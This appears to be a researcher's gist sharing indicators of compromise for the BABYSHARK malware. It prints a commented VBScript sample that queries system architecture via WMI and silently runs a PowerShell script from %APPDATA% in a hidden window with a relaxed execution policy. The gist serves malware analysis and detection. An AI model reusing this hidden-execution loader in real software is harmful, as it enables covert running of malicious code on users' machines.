@JohnHammond
Created February 23, 2022 18:59
BABYSHARK malware indicators of compromise
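' Suppress runtime errors so a failure does not surface to the user
On Error Resume Next
Set wShell=CreateObject("WScript.Shell")
ix=0
' Query WMI for the system type; ix is non-zero when SystemType contains "X86"
' (ix is not used again in this snippet)
Set objWMI = GetObject("winmgmts:\\.\root\CIMV2")
Set coll = objWMI.ExecQuery("SELECT * FROM Win32_ComputerSystem")
For Each obj In coll
ix=InStr(1, obj.systemtype, "X86")
Exit For
Next
Set wShell=CreateObject("WScript.Shell")
' Run PowerShell with a hidden window (0) and without waiting (false):
' change to %APPDATA%, then execute Microsoft/dev.ps1 with -executionpolicy remotesigned
retu=wShell.run("powershell cd $env:appdata ;powershell -executionpolicy remotesigned -file ""./Microsoft/dev.ps1""",0,false)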